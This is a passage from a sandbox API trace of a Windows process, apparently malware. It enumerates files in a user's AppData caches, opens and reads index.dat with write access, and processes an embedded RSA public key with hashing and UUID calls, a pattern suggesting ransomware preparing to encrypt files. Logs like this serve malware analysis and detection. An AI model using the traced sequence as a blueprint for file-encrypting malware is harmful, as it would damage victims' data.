HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned="" [0241.423] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe07ca6f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe07ca6f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0x965accc0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", cAlternateFileName="9C888B~2")) returned 1 [0241.423] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned="" [0241.423] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54bc3730, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54bc3730, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb11d4fc0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", cAlternateFileName="A9E4F7~1")) returned 1 [0241.423] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned="" [0241.423] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53bfe570, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53bfe570, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbe9b34f0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1ec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", cAlternateFileName="ACF244~1")) returned 1 [0241.423] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned="" [0241.423] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe04aaa10, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe04aaa10, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xae4e7080, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", cAlternateFileName="B3BB9C~2")) returned 1 [0241.423] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned="" [0241.423] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xefc01b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xefc01b00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaa4ee1e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", cAlternateFileName="B3BB9C~1")) returned 1 [0241.423] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned="" [0241.423] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54322770, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54322770, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf019010, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x204, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", cAlternateFileName="BC570E~2")) returned 1 [0241.424] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned="" [0241.424] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x540c1170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540c1170, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf019010, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x204, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", cAlternateFileName="BC570E~1")) returned 1 [0241.424] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned="" [0241.424] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x56bb3b80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x56bb3b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaeca3800, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", cAlternateFileName="C46E7B~2")) returned 1 [0241.424] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned="" [0241.424] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x682fbd00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x682fbd00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae0bca00, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", cAlternateFileName="C46E7B~3")) returned 1 [0241.424] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned="" [0241.424] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5461c2f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5461c2f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf67eb30, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", cAlternateFileName="C46E7B~1")) returned 1 [0241.424] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned="" [0241.424] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x728c68a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x728c68a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xae63dce0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", cAlternateFileName="D47DBD~2")) returned 1 [0241.424] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned="" [0241.424] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x545f6190, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x545f6190, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69b6e1e0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", cAlternateFileName="D47DBD~1")) returned 1 [0241.424] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned="" [0241.424] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x808d4a70, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x808d4a70, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x808d4a70, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", cAlternateFileName="D52C56~1")) returned 1 [0241.424] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned="" [0241.424] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x683e0540, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x683e0540, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f015a0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", cAlternateFileName="EA6180~1")) returned 1 [0241.424] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned="" [0241.424] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf312b90, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf312b90, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf312b90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", cAlternateFileName="F293AE~1")) returned 1 [0241.424] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned="" [0241.424] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 1 [0241.424] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0241.424] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 0 [0241.425] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0241.426] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0241.426] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0241.426] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0241.426] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0241.426] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0241.426] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0241.426] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0241.426] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0241.426] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0241.426] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0241.426] PathFindFileNameW (pszPath="") returned="" [0241.426] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0241.427] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0241.427] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="36USA68T", cAlternateFileName="")) returned 1 [0241.427] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x605dd8a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3O75JDME", cAlternateFileName="")) returned 1 [0241.427] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbaf619f0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0241.427] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat") returned=".dat" [0241.427] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0241.428] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=32768) returned 1 [0241.428] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0241.430] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x7fda, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0241.430] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0241.479] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0241.479] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x8000, lpOverlapped=0x0) returned 1 [0241.595] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0241.595] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0241.595] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0241.595] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a220) returned 1 [0241.596] CryptCreateHash (in: hProv=0x67a220, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0241.596] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0241.596] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0241.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0241.596] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0241.596] GetLastError () returned 0x0 [0241.596] CryptDestroyHash (hHash=0x33f0408) returned 1 [0241.596] CryptReleaseContext (hProv=0x67a220, dwFlags=0x0) returned 1 [0241.596] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0241.596] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0241.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0241.596] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0241.597] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0241.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0241.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fa0 | out: hHeap=0x620000) returned 1 [0241.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fb8 | out: hHeap=0x620000) returned 1 [0241.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89000 | out: hHeap=0x620000) returned 1 [0241.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0241.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0241.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89000 [0241.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0241.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88fb8 [0241.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0241.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b88fa0 [0241.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0241.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b830 [0241.597] RtlAllocateHeap (HeapHandle=0x620000, 